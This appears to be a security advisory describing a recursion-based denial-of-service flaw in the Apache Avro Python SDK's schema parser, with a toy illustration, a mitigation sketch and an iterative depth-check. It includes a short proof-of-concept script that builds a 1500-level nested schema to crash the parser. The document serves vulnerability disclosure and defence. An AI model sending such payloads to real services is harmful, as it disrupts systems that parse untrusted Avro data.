Apache Avro: Denial of Service (DoS) via Recursive Schema Parsing
Summary
The Apache Avro Python SDK is vulnerable to a Denial of Service (DoS) attack. A maliciously crafted Avro schema (.avsc) or data file (.avro) containing a deeply nested schema can exceed the Python interpreter's recursion limit and raise a RecursionError. If the application does not catch the error, it crashes.
Vulnerability Details
- Affected Component: avro.schema.parse and avro.io.DatumReader.
- Root Cause: The function make_avsc_object in avro/schema.py uses a recursive approach to parse nested records and types. It lacks a depth limit or an iterative implementation, making it susceptible to stack exhaustion.
- Attack Vector: An attacker can provide a schema with hundreds or thousands of nested records. When the application attempts to parse this schema (either directly or as part of reading an Avro data file), it will trigger a RecursionError.
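The failure mode can be illustrated without Avro installed. The sketch below is a toy stand-in, not Avro's code: toy_parse, build_nested, and parses_cleanly are hypothetical names, and the only property they share with the make_avsc_object behavior described above is one level of recursion per nested record with no depth limit.

```python
import sys


def toy_parse(schema):
    """Hypothetical stand-in for a recursive schema parser (not Avro's code).

    Each nested record costs at least one additional Python call frame.
    """
    if isinstance(schema, dict) and schema.get("type") == "record":
        return {
            "name": schema["name"],
            "fields": [toy_parse(field["type"]) for field in schema["fields"]],
        }
    return schema  # primitive type name such as "int"


def build_nested(depth):
    """Build `depth` nested records with a loop, so construction cannot overflow."""
    schema = "int"
    for i in range(depth):
        schema = {
            "type": "record",
            "name": f"L{i}",
            "fields": [{"name": "f", "type": schema}],
        }
    return schema


def parses_cleanly(depth):
    """Return True if toy_parse finishes, False if it hits the recursion limit."""
    try:
        toy_parse(build_nested(depth))
        return True
    except RecursionError:
        return False


# A depth well beyond the interpreter's current recursion limit.
DEEP = sys.getrecursionlimit() * 2
```

Under these assumptions, parses_cleanly(10) succeeds while parses_cleanly(DEEP) fails, because the number of call frames grows linearly with attacker-controlled nesting.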
Impact
- Severity: Medium (DoS)
- Effect: Application crash. This can be used to disrupt data processing pipelines, web services, or any application that consumes untrusted Avro data or schemas.
Proof of Concept (PoC)
The following Python script generates a malicious schema and demonstrates the crash:
import avro.schema

# Malicious schema with 1500 nested records
schema_str = '{"type": "record", "name": "L0", "fields": [{"name": "f", "type": "int"}]}'
for i in range(1, 1500):
    # Wrap the previous schema as the field type of a new outer record
    schema_str = f'{{"type": "record", "name": "L{i}", "fields": [{{"name": "f", "type": {schema_str}}}]}}'

try:
    # This will trigger a RecursionError in the Avro parser
    avro.schema.parse(schema_str)
except RecursionError:
    print("VULNERABILITY CONFIRMED: RecursionError during schema parsing!")
Mitigation
- Short-term: Implement a maximum recursion depth limit in avro.schema.parse.
- Long-term: Refactor the schema parser to use an iterative approach instead of recursion.
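Until the library enforces a limit, an application could approximate the short-term mitigation with a pre-check of its own. The following is a minimal sketch under stated assumptions, not Avro API: nesting_depth, reject_if_too_deep, and the limit of 64 are hypothetical. The walk uses an explicit stack, so the check itself cannot exhaust the call stack, which also illustrates the iterative style suggested for the long-term fix.

```python
MAX_SCHEMA_DEPTH = 64  # assumed limit for illustration; tune per application


def nesting_depth(schema):
    """Return the maximum container nesting depth of a decoded schema.

    Iterative (explicit stack), so arbitrarily deep input is safe to measure.
    A bare primitive such as "int" has depth 1.
    """
    max_depth = 0
    stack = [(schema, 1)]
    while stack:
        node, depth = stack.pop()
        max_depth = max(max_depth, depth)
        if isinstance(node, dict):
            children = node.values()
        elif isinstance(node, list):
            children = node
        else:
            continue  # strings, numbers, etc. have no children
        for child in children:
            if isinstance(child, (dict, list)):
                stack.append((child, depth + 1))
    return max_depth


def reject_if_too_deep(schema, limit=MAX_SCHEMA_DEPTH):
    """Raise ValueError if the decoded schema nests deeper than `limit`."""
    depth = nesting_depth(schema)
    if depth > limit:
        raise ValueError(f"schema nesting depth {depth} exceeds limit {limit}")
    return schema
```

The depth counted here is JSON container depth, so each nested record adds three levels (the record object, its fields list, and the field object). The check operates on an already decoded object; decoding untrusted JSON text should be guarded separately, since CPython's json module can itself raise RecursionError on very deep input.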